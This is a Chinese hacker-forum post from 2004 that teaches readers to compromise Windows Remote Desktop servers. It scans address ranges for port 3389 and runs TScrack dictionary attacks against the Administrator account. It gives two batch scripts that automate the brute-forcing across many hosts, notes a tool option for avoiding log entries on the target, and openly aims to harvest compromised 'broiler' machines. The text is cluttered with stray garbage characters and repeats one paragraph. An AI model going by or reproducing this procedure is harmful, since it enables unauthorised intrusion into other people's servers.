|
作者:霜风 QQ:14226581
: e) u# D! b& U: ^, s; X终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
! Q* h+ y4 y. \/ B$ c7 J这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: 0 U7 S. A4 R; {7 l$ i# L% _. g
首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:$ P I' `4 {& T( n. u s
先打开superscan3如图1
* a+ i* A/ f1 H! m' x8 c4 B! p9 x6 @7 V* A! |, K! x" Z$ F" ]1 j. l
此主题相关图片如下:% x& \# u9 l2 U: e- T, G
2 ~3 Y6 t! G9 v% M8 _5 A7 }" X
; Y7 p1 Y/ b3 `, q0 `接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图29 D5 Z' o1 L# z- `3 o
1 e% F2 v( k: g1 d" p% `2 R& o此主题相关图片如下:, |* M4 T% [2 G" E- W( T
, g0 ]& \7 T; Z3 U# \6 Z
$ B: R& T* R8 e: E* z* v: _
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.
7 n3 E |7 P/ I, l$ B$ S1 z这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
+ {" U' S8 T* Z- i
$ q+ L* C& i2 s( X( I ~2 p& [此主题相关图片如下:
: ?+ @4 [ v/ C) W ~9 @4 k! I4 t# K
8 U: l1 C; R$ a) e* b% K
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。5 w- l( I1 Q; h, c/ @' x# y7 {, `
3 r3 {' z1 s7 T, e9 l( I! {
此主题相关图片如下:% M* u5 X8 G0 C6 E, D' _3 h# h' K
* k2 S- N; x! O+ j; a3 J
接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5% W' `2 m; n( ?& U
. [; K' e f) x" Y# Q. e
此主题相关图片如下:
^$ {& T2 P! ~8 Q2 E( T. a- a
% f, m- U# S9 e+ y进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
; j' I3 P0 B# }7 q所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。1 e$ u* o. R L9 u% v. R6 a
TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
6 L# S* H" E: ]" R: a, k0 U此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。
% i9 R1 D! u" O i在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:
c% ?6 Q% P3 T4 z! c( r0 f-h : Print usage help and exit
8 C% ]& R% m1 Y1 w, I-V : Print version info and exit
3 O3 m y2 V* b-s : Print chipher strenght info and exit
, }+ T5 Z, J: H! i-b : Enable failed password beep
( k, o5 {- z, Y! h% \-t : Use two simultaneous connections [EXPERIMENTAL]
5 W+ z9 o3 a$ ?+ `+ j# W0 N, @-N : Prevent System Log entries on targeted server
4 }' J" w( ?' m8 t' m1 ]-U : Uninstall tscrack and remove components3 o+ E' |& r3 c1 G2 P' y0 B3 I1 A
-f <number> : Wordlist entry to start cracking with
s* ^5 b. b! d# \! j: S) I) V-F <delay> : Sampling Frequency (Delay between samples in ms)
/ [& S) U$ J. c; {8 Y5 g-l <user> : Account name to use, defaults to Administrator8 a7 ?8 Z1 W8 B9 @3 S# C
-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted' T q6 L2 |, b6 D9 _3 i3 b& @
-p <password> : Use <password> to logon instead of wordlist/blank pass! i, b4 |3 ~4 |) G4 [6 B/ A- X. I
-D <domain> : Specify domain to attempt logon to
8 o& T8 E; U3 P U' R
& A4 i3 ~4 V1 G
# [- R* b2 H3 Z; h/ f+ q" W我就帮忙翻译一下吧,翻译得不好可不要怪我啊:
9 A! q, Y4 Y u-h : 显示使用帮助然后退出/ o( O8 ]2 V' Q
-V : 显示版本信息然后退出) G2 H( G3 Z% ^* G7 A
-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)+ n+ V( @- |( X* a W* ]6 o& n
-b : 密码错误时发出声音
' N7 E2 a4 Z d- k-t : 同时发出多个连接,就是多线程。2 u: F+ C: F. }3 Y8 N; N
-N : Prevent System Log entries on targeted server
0 I) Q% [& n5 {- @/ j-U : 卸载移除tscrack组件。
2 J; M7 Z1 } @-f <number> : 使用-F后面的密码。
% x7 v" X. B$ [* {$ R# }3 M o$ d# D; L-F <delay> : 间隔时间(频率)" `( x5 ^) \( Q0 i, j/ q5 S
-l <user> : 使用-L后面的用户名
' C7 r$ f! I) @1 z/ s$ x-w <wordlist> : 使用-W后面的字典
- |9 F: B- e* i: T-p <password> : 使用-W后的密码
: V, I! T0 d. }" ~# y5 {8 V-D <domain> : 登陆主页面?
% F' V' l% Q0 r% h% x" }. a相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:
$ A8 t4 A K. J8 n, t$ x( s) h G/ z' @@if not exist IpcScan.txt goto noscan% j$ _) d( y6 _! F
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i9 O; B+ @) X! O8 h* j& k9 a i
:noscan
' e6 j5 G& T' u@echo 3389.txt no find or scan faild  0 P- _; {0 i/ i. w4 d
这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)
5 E! |2 \+ w: [4 N3 e( s保存后把后错名改为BAT就可以了。
9 J( U! c: _ D8 e还写一个BAT,名字为HACK.BAT,代码如下:3 E' m) y0 T0 N. l$ r
@if not exist tscrack.exe goto noscan
9 T# D. X7 B. r- F/ p@tscrack %1 -l administartor -w pass.dic >>rouji.txt
" Z6 o( u5 g; ?8 Q; N2 W" s:noscan5 [- w- |0 d# U: ^# e& K/ E
@echo tscrack.exe no find or scan faild
" x! S9 ~$ L% ^+ ]: s+ q这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
) x) R+ g- ?7 g, @8 e制作方法如上。
2 l. h. Y f J% g' S& \然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6+ Y& z" p, W* @# L* ?, V% }" }: w
) H/ e9 ~' W" M) \此主题相关图片如下:* E/ ~6 @1 a+ @ {& {
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
- `& U0 w2 j. G! f最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7* A- S4 r. _ Y
/ ^( D* @; H/ O
此主题相关图片如下:- t. o5 k3 }" ]- T
5 F- Q6 |% ^* B, ~8 _0 U怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
9 l' p7 _+ I. ?最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
